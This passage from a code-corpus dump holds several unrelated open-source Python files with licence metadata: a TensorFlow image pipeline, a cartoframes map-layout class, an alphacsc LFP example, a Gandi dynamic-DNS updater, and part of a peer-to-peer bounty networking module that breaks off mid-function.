def create_input_pipeline_yida(files1, files2, batch_size, n_epochs, shape, crop_shape=None,
crop_factor=1.0, n_threads=1, seed=None):
producer1 = tf.train.string_input_producer(
files1, capacity=len(files1), shuffle=False)
producer2 = tf.train.string_input_producer(
files2, capacity=len(files2), shuffle=False)
# We need something which can open the files and read its contents.
reader = tf.WholeFileReader()
# We pass the filenames to this object which can read the file's contents.
# This will create another queue running which dequeues the previous queue.
keys1, vals1 = reader.read(producer1)
keys2, vals2 = reader.read(producer2)
# And then have to decode its contents as we know it is a jpeg image
imgs1 = tf.image.decode_jpeg(vals1, channels=3)
imgs2 = tf.image.decode_jpeg(vals2, channels=3)
# We have to explicitly define the shape of the tensor.
# This is because the decode_jpeg operation is still a node in the graph
# and doesn't yet know the shape of the image. Future operations however
# need explicit knowledge of the image's shape in order to be created.
imgs1.set_shape(shape)
imgs2.set_shape(shape)
# Next we'll centrally crop the image to the size of 100x100.
# This operation required explicit knowledge of the image's shape.
if shape[0] > shape[1]:
rsz_shape = [int(shape[0] / shape[1] * crop_shape[0] / crop_factor),
int(crop_shape[1] / crop_factor)]
else:
rsz_shape = [int(crop_shape[0] / crop_factor),
int(shape[1] / shape[0] * crop_shape[1] / crop_factor)]
rszs1 = tf.image.resize_images(imgs1, rsz_shape[0], rsz_shape[1])
rszs2 = tf.image.resize_images(imgs2, rsz_shape[0], rsz_shape[1])
crops1 = (tf.image.resize_image_with_crop_or_pad(
rszs1, crop_shape[0], crop_shape[1])
if crop_shape is not None
else imgs1)
crops2 = (tf.image.resize_image_with_crop_or_pad(
rszs2, crop_shape[0], crop_shape[1])
if crop_shape is not None
else imgs2)
# Now we'll create a batch generator that will also shuffle our examples.
# We tell it how many it should have in its buffer when it randomly
# permutes the order.
min_after_dequeue = len(files1) // 5
# The capacity should be larger than min_after_dequeue, and determines how
# many examples are prefetched. TF docs recommend setting this value to:
# min_after_dequeue + (num_threads + a small safety margin) * batch_size
capacity = min_after_dequeue + (n_threads + 1) * batch_size
# Randomize the order and output batches of batch_size.
batch = tf.train.shuffle_batch([crops1, crops2],
enqueue_many=False,
batch_size=batch_size,
capacity=capacity,
min_after_dequeue=min_after_dequeue,
num_threads=n_threads,
#seed=seed,
)#shapes=(64,64,3))
# alternatively, we could use shuffle_batch_join to use multiple reader
# instances, or set shuffle_batch's n_threads to higher than 1.
return batch
def CELEByida(path):
fs = [os.path.join(path, f)
for f in os.listdir(path) if f.endswith('.jpg')]
fs=sorted(fs)
return fs
print("Loading celebrities...")
from libs.datasets import CELEB
files1 = CELEByida("../session-1/img_align_celeba/") # only 100
files2 = CELEByida("../session-1/img_align_celeba_n/") # only 100
from libs.dataset_utils import create_input_pipeline
batch_size = 8
n_epochs = 3
input_shape = [218, 178, 3]
crop_shape = [64, 64, 3]
crop_factor = 0.8
seed=15
batch1 = create_input_pipeline_yida(
files1=files1, files2=files2,
batch_size=batch_size,
n_epochs=n_epochs,
crop_shape=crop_shape,
crop_factor=crop_factor,
shape=input_shape,
seed=seed)
mntg=[]
sess = tf.Session()
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
batres = sess.run(batch1)
batch_xs1=np.array(batres[0])
batch_xs2=np.array(batres[1])
for i in range(0,len(batch_xs1)):
img=batch_xs1[i] / 255.0
mntg.append(img)
img=batch_xs2[i] / 255.0
mntg.append(img)
TID=datetime.date.today().strftime("%Y%m%d")+"_"+datetime.datetime.now().time().strftime("%H%M%S")
m=utils.montage(mntg, saveto="montage_"+TID+".png")
# mntg[0]=color
# mntg[1]=b/n
plt.figure(figsize=(5, 5))
plt.imshow(m)
plt.show()
# eop
| apache-2.0 | 4,011,695,546,058,428,000 | 29.823899 | 98 | 0.64293 | false |
CartoDB/cartoframes | cartoframes/viz/layout.py | 1 | 9384 | from . import constants
from .map import Map
from .html import HTMLLayout
from ..utils.utils import get_center, get_credentials
from ..utils.metrics import send_metrics
from .kuviz import KuvizPublisher
class Layout:
"""Create a layout of visualizations in order to compare them.
Args:
maps (list of :py:class:`Map <cartoframes.viz.Map>`): List of
maps. Zero or more of :py:class:`Map <cartoframes.viz.Map>`.
n_size (number, optional): Number of columns of the layout
m_size (number, optional): Number of rows of the layout
viewport (dict, optional): Properties for display of the maps viewport.
Keys can be `bearing` or `pitch`.
is_static (boolean, optional): By default is False. All the maps in each visualization
are interactive. In order to set them static images for performance reasons
set `is_static` to True.
map_height (number, optional): Height in pixels for each visualization.
Default is 250.
full_height (boolean, optional): When a layout visualization is published, it
will fit the screen height. Otherwise, each visualization height will be
`map_height`. Default True.
Raises:
ValueError: if the input elements are not instances of :py:class:`Map <cartoframes.viz.Map>`.
Examples:
Basic usage.
>>> Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ])
Display a 2x2 layout.
>>> Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ], 2, 2)
Custom Titles.
>>> Layout([
... Map(Layer('table_in_your_account'), title="Visualization 1 custom title"),
... Map(Layer('table_in_your_account'), title="Visualization 2 custom title")),
>>> ])
Viewport.
>>> Layout([
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account'))
>>> ], viewport={ 'zoom': 2 })
>>> Layout([
... Map(Layer('table_in_your_account'), viewport={ 'zoom': 0.5 }),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account'))
>>> ], viewport={ 'zoom': 2 })
Create an static layout
>>> Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ], is_static=True)
"""
def __init__(self,
maps,
n_size=None,
m_size=None,
viewport=None,
map_height=250,
full_height=True,
is_static=False,
**kwargs):
self._maps = maps
self._layout = _init_layout(self._maps, is_static, viewport)
self._n_size = n_size if n_size is not None else len(self._layout)
self._m_size = m_size if m_size is not None else constants.DEFAULT_LAYOUT_M_SIZE
self._viewport = viewport
self._is_static = is_static
self._map_height = map_height
self._full_height = full_height
self._publisher = None
self._carto_vl_path = kwargs.get('_carto_vl_path', None)
self._airship_path = kwargs.get('_airship_path', None)
def _repr_html_(self):
self._html_layout = HTMLLayout()
map_height = '100%' if self._full_height else '{}px'.format(self._map_height)
self._html_layout.set_content(
maps=self._layout,
size=['100%', self._map_height * self._m_size],
n_size=self._n_size,
m_size=self._m_size,
is_static=self._is_static,
map_height=map_height,
full_height=self._full_height,
_carto_vl_path=self._carto_vl_path,
_airship_path=self._airship_path
)
return self._html_layout.html
@send_metrics('map_published')
def publish(self, name, password, credentials=None, if_exists='fail', maps_api_key=None):
"""Publish the layout visualization as a CARTO custom visualization.
Args:
name (str): The visualization name on CARTO.
password (str): By setting it, your visualization will be protected by
password. When someone tries to show the visualization, the password
will be requested. To disable password you must set it to None.
credentials (:py:class:`Credentials <cartoframes.auth.Credentials>`, optional):
A Credentials instance. If not provided, the credentials will be automatically
obtained from the default credentials if available. It is used to create the
publication and also to save local data (if exists) into your CARTO account.
if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with
the same name already exists in your account. Default is 'fail'.
maps_api_key (str, optional): The Maps API key used for private datasets.
Example:
Publishing the map visualization.
>>> tlayout = Layout([
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account')),
... Map(Layer('table_in_your_account')), Map(Layer('table_in_your_account'))
>>> ])
>>> tlayout.publish('Custom Map Title', password=None)
"""
_credentials = get_credentials(credentials)
layers = []
for viz_map in self._maps:
for layer in viz_map.layers:
layers.append(layer)
self._publisher = _get_publisher(_credentials)
self._publisher.set_layers(layers, maps_api_key)
html = self._get_publication_html()
return self._publisher.publish(html, name, password, if_exists)
def update_publication(self, name, password, if_exists='fail'):
"""Update the published layout visualization.
Args:
name (str): The visualization name on CARTO.
password (str): setting it your visualization will be protected by
password and using `None` the visualization will be public.
if_exists (str, optional): 'fail' or 'replace'. Behavior in case a publication with the same name already
exists in your account. Default is 'fail'.
Raises:
PublishError: if the map has not been published yet.
"""
html = self._get_publication_html()
return self._publisher.update(html, name, password, if_exists)
def _get_publication_html(self):
if not self._publisher:
_credentials = get_credentials(None)
self._publisher = _get_publisher(_credentials)
html_layout = HTMLLayout('templates/viz/main_layout.html.j2')
layers = self._publisher.get_layers()
layer_index = 0
for viz_map in self._maps:
for layer in viz_map.layers:
layer.credentials = layers[layer_index].credentials
layer_index += 1
maps = _init_layout(self._maps, self._is_static, self._viewport)
map_height = '100%' if self._full_height else '{}px'.format(self._map_height)
html_layout.set_content(
maps=maps,
size=['100%', self._map_height * self._m_size],
n_size=self._n_size,
m_size=self._m_size,
is_static=self._is_static,
is_embed=True,
map_height=map_height
)
return html_layout.html
def _init_layout(maps, is_static, viewport):
layout = []
for map_index, viz in enumerate(maps):
if not isinstance(viz, Map):
raise ValueError('All the elements in the Layout should be an instance of Map.')
viz.is_static = _get_is_static(viz.is_static, is_static)
viz.viewport = _get_viewport(viz.viewport, viewport)
viz.camera = _get_camera(viz.viewport)
for layer in viz.layers:
layer.map_index = map_index
layer.reset_ui(viz)
layout.append(viz.get_content())
return layout
def _get_viewport(map_settings_viewport, layout_viewport):
if map_settings_viewport is not None:
return map_settings_viewport
return layout_viewport
def _get_camera(viewport):
camera = None
if viewport is not None:
camera = {
'center': get_center(viewport),
'zoom': viewport.get('zoom'),
'bearing': viewport.get('bearing'),
'pitch': viewport.get('pitch')
}
return camera
def _get_is_static(map_settings_is_static, layout_is_static):
if map_settings_is_static is not None:
return map_settings_is_static
return layout_is_static
def _get_publisher(credentials):
return KuvizPublisher(credentials)
| bsd-3-clause | 7,968,791,184,678,179,000 | 36.090909 | 117 | 0.586104 | false |
alphacsc/alphacsc | examples/csc/plot_lfp_data.py | 1 | 3791 | """
==============================
CSC to learn LFP spiking atoms
==============================
Here, we show how CSC can be used to learn spiking
atoms from Local Field Potential (LFP) data [1].
[1] Hitziger, Sebastian, et al.
Adaptive Waveform Learning: A Framework for Modeling Variability in
Neurophysiological Signals. IEEE Transactions on Signal Processing (2017).
"""
###############################################################################
# First, let us fetch the data (~14 MB)
import os
from mne.utils import _fetch_file
url = ('https://github.com/hitziger/AWL/raw/master/Experiments/data/'
'LFP_data_contiguous_1250_Hz.mat')
fname = './LFP_data_contiguous_1250_Hz.mat'
if not os.path.exists(fname):
_fetch_file(url, fname)
###############################################################################
# It is a mat file, so we use scipy to load it
from scipy import io
data = io.loadmat(fname)
X, sfreq = data['X'].T, float(data['sfreq'])
###############################################################################
# And now let us look at the data
import numpy as np
import matplotlib.pyplot as plt
start, stop = 11000, 15000
times = np.arange(start, stop) / sfreq
plt.plot(times, X[0, start:stop], color='b')
plt.xlabel('Time (s)')
plt.ylabel(r'$\mu$ V')
plt.xlim([9., 12.])
###############################################################################
# and filter it using a convenient function from MNE. This will remove low
# frequency drifts, but we keep the high frequencies
from mne.filter import filter_data
X = filter_data(
X.astype(np.float64), sfreq, l_freq=1, h_freq=None, fir_design='firwin')
###############################################################################
# Now, we define the parameters of our model.
reg = 6.0
n_times = 2500
n_times_atom = 350
n_trials = 100
n_atoms = 3
n_iter = 60
###############################################################################
# Let's stick to one random state for now, but if you want to learn how to
# select the random state, consult :ref:`this example
# <sphx_glr_auto_examples_plot_simulate_randomstate.py>`.
random_state = 10
###############################################################################
# Now, we epoch the trials
overlap = 0
starts = np.arange(0, X.shape[1] - n_times, n_times - overlap)
stops = np.arange(n_times, X.shape[1], n_times - overlap)
X_new = []
for idx, (start, stop) in enumerate(zip(starts, stops)):
if idx >= n_trials:
break
X_new.append(X[0, start:stop])
X_new = np.vstack(X_new)
del X
###############################################################################
# We remove the mean and scale to unit variance.
X_new -= np.mean(X_new)
X_new /= np.std(X_new)
###############################################################################
# The convolutions can result in edge artifacts at the edges of the trials.
# Therefore, we discount the contributions from the edges by windowing the
# trials.
from numpy import hamming
X_new *= hamming(n_times)[None, :]
###############################################################################
# Of course, in a data-limited setting we want to use as much of the data as
# possible. If this is the case, you can set `overlap` to non-zero (for example
# half the epoch length).
#
# Now, we run regular CSC since the trials are not too noisy
from alphacsc import learn_d_z
pobj, times, d_hat, z_hat, reg = learn_d_z(X_new, n_atoms, n_times_atom,
reg=reg, n_iter=n_iter,
random_state=random_state, n_jobs=1)
###############################################################################
# Let's look at the atoms now.
plt.figure()
plt.plot(d_hat.T)
plt.show()
| bsd-3-clause | -4,877,237,652,640,226,000 | 34.101852 | 79 | 0.512002 | false |
AlessioCasco/gandi-dyndns | gandi-dyndns.py | 1 | 9763 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
gandi-dyndns
@author: AlessioCasco
"""
from bottle import route, run, request, response
from optparse import OptionParser
import logging as log
import xmlrpclib
import json
import sys
import re
gandi_fqdn_ip = {}
@route('/ping', method=['GET', 'POST'])
def ping():
'''Function for monitoring/ping'''
response.headers['Server'] = 'gandi-dyndns'
response.status = 200
return('I\'am alive!\n')
@route('/nic_update', method=['GET', 'POST'])
def gandi_dyndns():
'''Main function'''
response.headers['Server'] = 'gandi-dyndns'
# dictionary gandi_fqdn_ip, has fqdn:ip key:value from all the legit requests
global gandi_fqdn_ip
# dictionar ynew_fqdn_ip, has fqdn:ip key:value from the current request
new_fqdn_ip = {}
# define the action to perform into the gandi_api function
action = ''
try:
fqdn, new_ip, fqdn_match = fetch_parameters()
except TypeError:
response.status = 400
return
# create new dictionary with the info we got from the webserver
new_fqdn_ip[fqdn] = new_ip
# check if we need to fetch the ip from gandi
try:
if new_fqdn_ip[fqdn] != gandi_fqdn_ip[fqdn]:
log.debug('Received IP differs from the one saved on Gandi, will update it')
action = 'update'
gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action)
return
except KeyError:
log.debug('Do not know the current Gandi IP for fqdn %s, will fetch it' % fqdn)
try:
action = 'fetch'
gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action)
if new_fqdn_ip[fqdn] != gandi_fqdn_ip[fqdn]:
action = 'update'
gandi_fqdn_ip = gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action)
return
except ValueError:
response.status = 404
return
log.debug('Nothing to do, received IP is same as the one configured on gandi for %s' % fqdn)
return
def fetch_parameters():
'''Fetch parameters from the GET request'''
new_ip = ''
method = request.environ.get('REQUEST_METHOD')
# check for missing parameters
if not request.params.ip and not request.params.fqdn:
log.error('Received malformed request, both parameters (fqdn & ip) are missing. Got: \"%s\"' % request.url)
return
elif not request.params.ip:
new_ip = request.environ.get('REMOTE_ADDR')
log.debug('IP parameter is missing, will use client source one: %s' % new_ip)
elif not request.params.fqdn:
log.error('Received malformed request, fqdn parameter is missing. Got: \"%s\"' % request.url)
return
if not new_ip:
new_ip = request.params.ip
fqdn = request.params.fqdn
# check if parameters have correct informations
fqdn_match = re.match(r'^([a-zA-Z0-9][a-zA-Z0-9-]{1,61})\.([a-zA-Z0-9][a-zA-Z0-9-]{1,61}\.[a-zA-Z]{2,}$)', fqdn)
ip_match = re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', new_ip)
priv_ip_match = re.match(r'^(?:10|127|172\.(?:1[6-9]|2[0-9]|3[01])|192\.168)\..*', new_ip)
if not fqdn_match and not ip_match:
log.error('Received invalid values on both parameters. Got fqdn:\"%s\" & IP: %s' % (fqdn, new_ip))
return
elif not ip_match:
log.error('Received invalid ip value. Got %s' % new_ip)
return
elif priv_ip_match:
log.error('Received IP is not a public one. Got %s' % new_ip)
return
elif not fqdn_match:
log.error('Received invalid fqdn value. Got \"%s\"' % fqdn)
return
log.debug('Received %s request: fqdn:\"%s\" & IP: %s' % (method, fqdn, new_ip))
return fqdn, new_ip, fqdn_match
def gandi_api(new_fqdn_ip, gandi_fqdn_ip, fqdn, fqdn_match, action):
'''Funcion for managing the Gandi API'''
# define some variables about gandi
api = xmlrpclib.ServerProxy('https://rpc.gandi.net/xmlrpc/')
apikey = config['apikey']
hostname = (fqdn_match.group(1))
domain = (fqdn_match.group(2))
# check if the domain is managed by the apikey provided
if not (api.domain.list(apikey, {'~fqdn': domain})):
log.error('Apikey provided does not manage %s domain' % domain)
raise ValueError('Apikey provided does not manage %s domain' % domain)
# check available zones
zones = api.domain.zone.list(apikey)
for zone in zones:
if (zone['name']) == domain:
zone_id = zone['id']
log.debug('Zone id %s found, for domain %s' % (zone_id, domain))
break
else:
log.error('Could not find zone file called %s, you must have a zone having same name as the domain you want to manage' % domain)
raise ValueError('Could not find zone file called %s, you must have a zone having same name as the domain you want to manage' % domain)
# check if we have to fetch the gandi api
if action == 'fetch':
# check & retrieve informations from recods in zone
records = api.domain.zone.record.list(apikey, zone_id, 0)
for record in records:
if (record['name'] == hostname and record['type'].lower() == 'a'):
# add fqdn/ip to the gandi_fqdn_ip dictionary
gandi_fqdn_ip[fqdn] = record['value']
log.debug('DNS \'A\' record found for subdomain \'%s\' having value %s' % (hostname, gandi_fqdn_ip[fqdn]))
break
else:
log.error('Unable to find a DNS \'A\' record for subdomain \'%s\'' % hostname)
raise ValueError('Unable to find a DNS \'A\' record for subdomain \'%s\'' % hostname)
return gandi_fqdn_ip
# check if we have to update the the ip
elif action == 'update':
# create a new zone from the existing one
zone_version = api.domain.zone.version.new(apikey, zone_id)
log.debug('New zone created, new version: %s' % zone_version)
# delete the A record from the new version
api.domain.zone.record.delete(apikey, zone_id, zone_version, {"type": ["A"], "name": [hostname]})
log.debug('Deleted \'A\' record from new zone version %s' % zone_version)
# add the A record we want
new_record = api.domain.zone.record.add(apikey, zone_id, zone_version, {"type": "A", "name": hostname, "value": new_fqdn_ip[fqdn], "ttl": 300})
log.debug('New \'A\' record added as follow: %s' % new_record)
# active the new zone version
if api.domain.zone.version.set(apikey, zone_id, zone_version):
log.info('New IP %s for fqdn %s updated succesfully.' % (new_fqdn_ip[fqdn], fqdn))
else:
log.error('Unable to update IP %s for fqdn %s' % (new_fqdn_ip[fqdn], fqdn))
return
# update gandi_fqdn_ip with the value just saved in the new zone version
gandi_fqdn_ip[fqdn] = new_fqdn_ip[fqdn]
return gandi_fqdn_ip
def init_application():
def get_options():
'''Load options from the command line'''
default_config = "config.json"
parser = OptionParser(usage="usage: %prog [options]")
parser.add_option(
"-c",
"--config",
dest="configfile",
default=default_config,
help='Config file relative or absolute path. Default is %s' % default_config)
(options, args) = parser.parse_args()
if options.configfile is not None:
options.configfile = options.configfile.strip(' ')
return options
def read_config_file(configfile):
'''Loads the config file from disk'''
try:
with open(configfile) as f:
config = validate_config(json.load(f))
return config
# catch if file doesn't exist
except IOError:
print('Config file %s not found' % configfile)
sys.exit(1)
# catch if json file is not formatted corectly
except ValueError:
print('Json file is not formatted properly')
sys.exit(1)
def validate_config(raw_config):
'''Checks the config file.'''
# check if required patameters are present inside the config
if 'port' not in raw_config or 'bind' not in raw_config or 'apikey' not in raw_config or 'logging' not in raw_config:
print('Config file has missing parameters')
sys.exit(1)
else:
return raw_config
def configure_logging(config):
'''Configure logging'''
if config['logging']['log_enable'] == "false":
log.disable('CRITICAL')
return
elif config['logging']['log_enable'] == "true":
try:
log.basicConfig(
format='%(asctime)-15s [%(levelname)s] %(message)s',
filename=config['logging']['log_file'],
level=config['logging']['log_level'])
except ValueError:
print('Log level is not set with a correct value, check the README.md for the full list')
sys.exit(1)
except IOError:
print('Unable to create the log file, check if gandi-dyndns has write permissions')
sys.exit(1)
return
else:
print('Bad congig file, log_enable is not set with a correct value, (true|false) are the two only options')
sys.exit(1)
options = get_options()
config = read_config_file(options.configfile)
configure_logging(config)
return config
if __name__ == "__main__":
config = init_application()
# init webserver
run(host=config["bind"], port=config["port"], quiet=True)
| mit | -3,330,188,730,535,708,700 | 40.021008 | 151 | 0.597767 | false |
gappleto97/Senior-Project | common/peers.py | 1 | 16088 | from multiprocessing import Queue
import multiprocessing, os, pickle, select, socket, sys, time, rsa, traceback
from common.safeprint import safeprint
from common.bounty import *
global ext_port
global ext_ip
global port
global myPriv
global myPub
global propQueue
ext_port = -1
ext_ip = ""
port = 44565
myPub, myPriv = rsa.newkeys(1024)
propQueue = multiprocessing.Queue()
seedlist = [("127.0.0.1", 44565), ("localhost", 44565),
("10.132.80.128", 44565)]
peerlist = [("24.10.111.111", 44565)]
remove = []
bounties = []
# constants
peers_file = "data" + os.sep + "peerlist.pickle"
key_request = "Key Request".encode('utf-8')
close_signal = "Close Signal".encode("utf-8")
peer_request = "Requesting Peers".encode("utf-8")
bounty_request = "Requesting Bounties".encode("utf-8")
incoming_bounties = "Incoming Bounties".encode("utf-8")
incoming_bounty = "Incoming Bounty".encode("utf-8")
valid_signal = "Bounty was valid".encode("utf-8")
invalid_signal = "Bounty was invalid".encode("utf-8")
end_of_message = "End of message".encode("utf-8")
sig_length = len(max(
close_signal, peer_request, bounty_request, incoming_bounties,
incoming_bounty, valid_signal, invalid_signal, key=len))
def pad(string):
return string + " ".encode('utf-8') * (sig_length - (((len(string) - 1) % sig_length) + 1))
close_signal = pad(close_signal)
peer_request = pad(peer_request)
bounty_request = pad(bounty_request)
incoming_bounties = pad(incoming_bounties)
incoming_bounty = pad(incoming_bounty)
valid_signal = pad(valid_signal)
invalid_signal = pad(invalid_signal)
end_of_message = pad(end_of_message)
signals = [close_signal, peer_request, bounty_request, incoming_bounty, valid_signal, invalid_signal]
def send(msg, conn, key):
while key is None:
safeprint("Key not found. Requesting key")
conn.send(key_request)
try:
key = pickle.loads(conn.recv(1024))
key = rsa.PublicKey(key[0], key[1])
safeprint("Key received")
except EOFError:
continue
if not isinstance(msg, type("a".encode('utf-8'))):
msg = msg.encode('utf-8')
x = 0
while x < len(msg) - 117:
conn.sendall(rsa.encrypt(msg[x:x+117], key))
x += 117
conn.sendall(rsa.encrypt(msg[x:], key))
conn.sendall(rsa.encrypt(end_of_message, key))
return key
def recv(conn):
received = "".encode('utf-8')
a = ""
try:
while True:
a = conn.recv(128)
if a == key_request:
safeprint("Key requested. Sending key")
conn.sendall(pickle.dumps((myPriv.n, myPriv.e), 0))
continue
a = rsa.decrypt(a, myPriv)
safeprint("Packet = " + str(a), verbosity=3)
if a == end_of_message:
return received
received += a
except rsa.pkcs1.DecryptionError as error:
safeprint("Decryption error---Content: " + str(a))
return "".encode('utf-8')
def get_lan_ip():
"""Retrieves the LAN ip. Expanded from http://stackoverflow.com/a/28950776"""
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('8.8.8.8', 23))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def getFromFile():
"""Load peerlist from a file"""
if os.path.exists(peers_file):
try:
peerlist.extend(pickle.load(open(peers_file, "rb")))
trimPeers()
except:
safeprint("Could not load peerlist from file")
def saveToFile():
"""Save peerlist to a file"""
if not os.path.exists(peers_file.split(os.sep)[0]):
os.mkdir(peers_file.split(os.sep)[0])
pickle.dump(peerlist[:], open(peers_file, "wb"), 0)
def getFromSeeds():
"""Make peer requests to each address on the seedlist"""
for seed in seedlist:
safeprint(seed, verbosity=1)
peerlist.extend(requestPeerlist(seed))
time.sleep(1)
def requestPeerlist(address):
"""Request the peerlist of another node. Currently has additional test commands"""
conn = socket.socket()
conn.settimeout(5)
safeprint(address, verbosity=1)
try:
conn.connect(address)
key = send(peer_request, conn, None)
received = recv(conn)
safeprint(pickle.loads(received), verbosity=2)
if recv(conn) == peer_request:
handlePeerRequest(conn, False, key=key, received=pickle.loads(received))
recv(conn)
conn.close()
return pickle.loads(received)
except Exception as error:
safeprint("Failed:" + str(type(error)))
safeprint(error)
remove.extend([address])
return []
def requestBounties(address):
"""Request the bountylist of another node"""
conn = socket.socket()
conn.settimeout(5)
safeprint(address, verbosity=1)
try:
conn.connect(address)
key = send(bounty_request, conn, None)
received = recv(conn)
if recv(conn) == bounty_request:
handleBountyRequest(conn, False, key=key, received=pickle.loads(received))
safeprint(recv(conn))
conn.close()
addBounties(pickle.loads(received))
except Exception as error:
safeprint("Failed:" + str(type(error)))
safeprint(error)
remove.extend([address])
def initializePeerConnections(newPort, newip, newport):
"""Populate the peer list from a previous session, seeds, and from the peer list if its size is less than 12. Then save this new list to a file"""
port = newPort # Does this affect the global variable?
ext_ip = newip # Does this affect the global variable?
ext_port = newport # Does this affect the global variable?
safeprint([ext_ip, ext_port])
getFromFile()
safeprint("peers fetched from file", verbosity=1)
getFromSeeds()
safeprint("peers fetched from seedlist", verbosity=1)
trimPeers()
if len(peerlist) < 12:
safeprint(len(peerlist))
newlist = []
for peer in peerlist:
newlist.extend(requestPeerlist(peer))
peerlist.extend(newlist)
trimPeers()
safeprint("getting bounties from peers and seeds", verbosity=1)
for peer in peerlist[:] + seedlist[:]:
requestBounties(peer)
safeprint("peer network extended", verbosity=1)
saveToFile()
safeprint("peer network saved to file", verbosity=1)
safeprint(peerlist)
safeprint([ext_ip, ext_port])
def trimPeers():
"""Trim the peerlist to a single set, and remove any that were marked as erroneous before"""
temp = list(set(peerlist[:]))
for peer in remove:
try:
del temp[temp.index(peer)]
except:
continue
del remove[:]
del peerlist[:]
peerlist.extend(temp)
def listen(port, outbound, q, v, serv):
"""BLOCKING function which should only be run in a daemon thread. Listens and responds to other nodes"""
if serv:
from server.bounty import verify, addBounty
server = socket.socket()
server.bind(("0.0.0.0", port))
server.listen(10)
server.settimeout(5)
if sys.version_info[0] < 3 and sys.platform == "win32":
server.setblocking(True)
global ext_ip, ext_port
if outbound is True:
safeprint("UPnP mode is disabled")
else:
safeprint("UPnP mode is enabled")
if not portForward(port):
outbound = True
safeprint([outbound, ext_ip, ext_port])
q.put([outbound, ext_ip, ext_port])
while v.value: # is True is implicit
safeprint("listening on " + str(get_lan_ip()) + ":" + str(port), verbosity=3)
if not outbound:
safeprint("forwarded from " + ext_ip + ":" + str(ext_port), verbosity=3)
try:
conn, addr = server.accept()
server.setblocking(True)
conn.setblocking(True)
safeprint("connection accepted")
packet = recv(conn)
safeprint("Received: " + packet.decode(), verbosity=3)
key = None
if packet == peer_request:
key = handlePeerRequest(conn, True, key=key)
elif packet == bounty_request:
key = handleBountyRequest(conn, True, key=key)
elif packet == incoming_bounty:
key = handleIncomingBounty(conn, key=key)
send(close_signal, conn, key)
conn.close()
server.settimeout(5)
safeprint("connection closed")
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
traceback.print_exc()
def handlePeerRequest(conn, exchange, key=None, received=[]):
"""Given a socket, send the proper messages to complete a peer request"""
if ext_port != -1:
unfiltered = peerlist[:] + [((ext_ip, ext_port), myPub.n, myPub.e)]
unfiltered = peerlist[:]
filtered = list(set(unfiltered) - set(received))
safeprint("Unfiltered: " + str(unfiltered), verbosity=3)
safeprint("Filtered: " + str(filtered), verbosity=3)
toSend = pickle.dumps(filtered, 0)
safeprint("Sending")
key = send(toSend, conn, key)
if exchange:
send(peer_request, conn, key)
received = recv(conn)
safeprint("Received exchange", verbosity=1)
safeprint(pickle.loads(received), verbosity=3)
peerlist.extend(pickle.loads(received))
trimPeers()
return key
def handleBountyRequest(conn, exchange, key=None, received=[]):
"""Given a socket, send the proper messages to complete a bounty request"""
unfiltered = getBountyList()
filtered = list(set(unfiltered) - set(received))
toSend = pickle.dumps(filtered, 0)
safeprint("Sending")
key = send(toSend, conn, key)
if exchange:
send(bounty_request, conn, key)
received = recv(conn)
safeprint("Received exchange")
try:
safeprint(pickle.loads(received), verbosity=2)
bounties = pickle.loads(received)
valids = addBounties(bounties)
toSend = []
for i in range(len(bounties)):
if valids[i] >= 0: # If the bounty is valid and not a duplicate, add it to propagation list
toSend.append(bounties[i])
propQueue.put((incoming_bounties, toSend))
except Exception as error:
safeprint("Could not add bounties")
safeprint(type(error))
traceback.print_exc()
# later add function to request without charity bounties
return key
def handleIncomingBounty(conn, key=None):
"""Given a socket, store an incoming bounty & report it valid or invalid"""
received = recv(conn)
safeprint("Adding bounty: " + received.decode())
try:
valid = addBounty(received)
if valid >= -1: # If valid, even if a duplicate, send valid signal
safeprint("Sending valid signal")
send(valid_signal, conn, key)
if valid >= 0: # If valid and not already received, propagate
propQueue.put((incoming_bounty, received))
else:
send(invalid_signal, conn, key)
except Exception as error:
send(invalid_signal, conn, key)
safeprint("Incoming failed: " + str(type(error)))
safeprint(error)
traceback.print_exc()
return key
def propagate(tup):
try:
conn = socket.socket()
address = tup[1]
conn.connect(address)
key = send(incoming_bounty, conn, None)
send(pickle.dumps(tup[0], 0), conn, key)
recv(conn)
conn.close()
except socket.error as Error:
safeprint("Connection to " + str(address) + " failed; cannot propagate")
def portForward(port):
"""Attempt to forward a port on your router to the specified local port. Prints lots of debug info."""
try:
import miniupnpc
u = miniupnpc.UPnP(None, None, 200, port)
# Begin Debug info
safeprint('inital(default) values :')
safeprint(' discoverdelay' + str(u.discoverdelay))
safeprint(' lanaddr' + str(u.lanaddr))
safeprint(' multicastif' + str(u.multicastif))
safeprint(' minissdpdsocket' + str(u.minissdpdsocket))
safeprint('Discovering... delay=%ums' % u.discoverdelay)
safeprint(str(u.discover()) + 'device(s) detected')
# End Debug info
u.selectigd()
global ext_ip
ext_ip = u.externalipaddress()
safeprint("external ip is: " + str(ext_ip))
for i in range(0, 20):
try:
safeprint("Port forward try: " + str(i), verbosity=1)
if u.addportmapping(port+i, 'TCP', get_lan_ip(), port, 'Bounty Net', ''):
global ext_port
ext_port = port + i
safeprint("External port is " + str(ext_port))
return True
except Exception as error:
safeprint("Failed: " + str(type(error)))
safeprint(error)
except Exception as error:
